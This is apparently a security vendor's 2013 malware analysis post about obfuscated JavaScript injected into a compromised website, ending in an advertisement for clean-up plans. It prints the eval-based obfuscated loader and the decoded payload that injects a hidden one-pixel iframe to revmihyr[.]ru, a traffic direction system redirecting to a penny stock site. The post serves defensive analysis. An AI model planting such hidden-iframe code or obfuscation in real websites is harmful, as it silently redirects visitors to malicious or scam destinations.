Blacklisted website used to drive traffic to 'penny stock website'

8 May, 2013 · Read in about 2 min · (370 Words)

blackhat SEO Web malware scan reports and analysis obfuscated malicious JavaScript hidden malicious iframe traffic direction systems malicious javascript

Obfuscated malicious JavaScript code generated hidden iframe to drive traffic to customer website

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Usually, such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This website is located in Ukraine and it is used by Traffic Direction System (TDS) managed by malicious domain revmihyr[.]ru as referrer to 'penny stock' website. Malware scanner detected suspicious JavaScript code injected in 9 website pages. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. This post, in educational purposes, goes with the redirects to find the TDS 'customer'.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Wed May 8 10:51:43 2013

Infected website’s files: 9

Website malware scan report link: http://goo.gl/b0D8j

Quttera | Online Website Malware Scanner

Website malware scan report

Website malware scan report | Files analysis

9 web pages detected containing malicious JavaScript

Threat Dump

Decoded malicious javascript

Malware entry

Malware entry details.

Beautified script

e = eval;
v = "0" + "x";
a = 0;
try {
a &= 2
} catch (q) {
a = 1
}
if (!a) {
try {
document["body"] ^= ~1;
} catch (q) {
a2 = "_"
}
z ="2f_6d_7c_75_6a_7b_70_76_75_27_2f_......_11_84_30_2f_30_42"["split"](a2);
s = "";
for (i = 0; i < z.length; i++) {
s += String["fromCharCode"](e(v + (z[i])) - 5 - 2);
}
zaz = s;
e(zaz);
}

Malicious payload

Decoded payload injects hidden iframe to http://revmihyr.ru/count18.php

(function () {
var doff = document.createElement('iframe');
doff.src = 'http://revmihyr.ru/count18.php';
doff.style.position = 'absolute';
doff.style.border = '0';
doff.style.height = '1px';
doff.style.width = '1px';
doff.style.left = '1px';
doff.style.top = '1px';
if (!document.getElementById('doff')) {
document.write('
\'doff\'>
');
document.getElementById('doff').appendChild(doff);
}
})();

At the time this article is being written the .php in payload contains the following redirection:

Malicious redirect

Redirect to penny stock website

So in this case we can see that the customer of the TDS is actually some penny stock website that you don't want to visit.

Blacklisting status

The website is Suspicious on Google Safe Browsing.

Google Safe Browsing analysis

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Malware clean-up and hacking recovery for websites

Get your website cleaned and removed from blacklists. Prevent traffic loss and protect your visitors now.

Emergency
$249 / yr
1 Website
Initial Response Time within 4 hrs.
Manual Malware Removal / Full Website Audit
Blacklisting removal
Web Application Firewall (DNS-based WAF or Endpoint WAF)
Virtual Patching and website hardening
Free SSL Certificate with the DNS-based Web Application Firewall
all features...
Create Account

Essential Security
$10 / mo
1 Website
Initial Response Time within 12 hrs.
Web Application Firewall (DNS-based WAF or Endpoint WAF)
Virtual Patching and website hardening
Free SSL Certificate with the DNS-based Web Application Firewall
External & Internal Malware Scanning
all features...
Create Account

more plans

Need help? contactus@quttera.com

Join our mailing list to receive free email updates

Subscribe now

Latest Posts

tag